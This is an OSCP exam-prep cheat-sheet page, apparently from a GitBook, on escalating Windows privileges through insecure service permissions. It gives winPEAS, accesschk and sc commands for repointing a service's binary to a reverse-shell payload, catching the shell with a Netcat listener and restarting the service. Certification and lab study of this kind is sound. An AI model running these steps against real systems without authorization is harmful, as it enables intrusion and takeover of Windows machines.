✏️
OSCP
  • $WhoAmI?
  • Manual
  • NMAP
    • NSE Scripts
  • Steganography
  • Services Enumeration
    • Postgres Psql
    • SNMTP - 199
    • SSH - 22
    • TELNET - 23
    • RDP - 3389
    • DISTCCD - 3632
    • IMAP - 143
    • TFTP - UDP69
    • FTP - 21
    • HTTP 80/443
      • LFI to RCE
      • ShellShock
      • GIT
      • XXE, SQLI, CRLF, CSV,
      • CMS
      • Locations
        • Interested Linux Files
        • Logs
      • Command Injection
      • Remote File Inclusion (RFI)
      • File Upload Vulnerabilities
      • Remote Code Execution (RCE)
      • SQL Injection
      • Local File Inclusion (LFI)
        • LFI TO RCE
      • Web Enumeration
        • Patator BruteForce
        • ShellShock
        • Nikto
        • Anonymous Scanning
        • Fuzzers
        • DNS
    • SMB 139/445
      • SMB Exploit
      • SMB Enumerate
      • Send and Execute
      • Samba 2.2.x
    • RPC - 111
    • NFS
    • SNMP 161
    • SMTP 25
    • VNC - 5800
    • MYSQL - 3306
    • POP3 - 110
    • LDAP - 389
    • IRC 667
    • Java-RMI 1098/1099/1050
    • 1433 - MSSQL
  • Linux
    • Shells Linux
    • File Transfer
    • Linux Priv Esc
    • Fix Shell
    • Upload
    • Restricted Shell
  • Windows
    • File Transfer
    • Reverse Shell Cheatsheet
      • Full TTYs
      • Shells - Windows
      • MSFVENOM
    • Post Explotation
      • Nishang
      • Kernel Exploits
      • Service Exploits
      • Unquoted service paths
      • Mimikatz
    • BackDoors
    • EternalBlue MS17-010
    • Windows - Download and execute methods
    • Windows Priv Exc
    • Priv Esc Tools
    • ByPass UAC
      • Bypassing default UAC settings manually c++
      • EventVwr Bypass UAC Powershell
      • ByPass UAC Metasploit
      • Bypassing UAC with Kali’s bypassuac
      • Bypass UAC on Windows Vista
  • Password Attack
    • Intercepting Login Request
    • Windows Hashes
    • Linux Hashes
    • Wordlists
    • Brute Force Password Attacks & Cracking
    • Hashes
  • Network Pivoting Techniques
  • Buffer OverFlow
    • 6. Getting Shell
    • 5. Finding Bad Characters
    • 4. Overwrite EIP
    • 3. Finding The Offset
    • 2. Fuzzing
    • 1. Spiking
  • Downloads
  • Online Websites
  • Privilege Escalation History
  • Exploit
    • Unreal IRC
    • Sambacry
    • Shellshock
    • Padding Oracle Attack
Powered by GitBook
On this page

Was this helpful?

  1. Windows
  2. Post Explotation

Service Exploits

Windows Privilege Escalation Cheat Sheet – Service Exploits

Service exploits are very likely to come up in your OSCP exam.

This can include things like insecure file permissions and unquoted service path’s, amongst others.

This should probably be your biggest area of focus for Windows priv esc before your exam.

Insecure service permissions

Run winPEAS to check whether you can change the configuration of a service or not:

Download winPEAS to your Windows target

Execute the binary:
winpeas.exe

Can you modify the service?

Download accesschk.exe to your Windows target

accesschk.exe /accepteula -uwcqv user <SERVICE>

What does the service do? Can your user restart it?

sc qc <SERVICE>

'DEMAND_START' means the service would have to be restarted manually

'BINARY_PATH_NAME' points to the service executable

What is the current state of the service?

sc query <SERVICE>

Can you set a new binary path for the service?

If so, download a reverse shell payload to your target and set a new path:

sc config <SERVICE> binpath= "\"C:\NEW\PATH\TO\BINARY""

Set up a Netcat listener:

nc -lnvp <PORT>

Start or restart the service:

net start <SERVICE>

or

net restart <SERVICE>

or

sc config <SERVICE> start= demand

You might need to stop the service first:

net stop <SERVICE>

Offensive Security might try to be sneaky and disable your ability to start or restart a service.

You can, however, get around this by restarting the machine (if the service autoruns on startup):

shutdown /r
PreviousKernel ExploitsNextUnquoted service paths

Last updated 4 years ago

Was this helpful?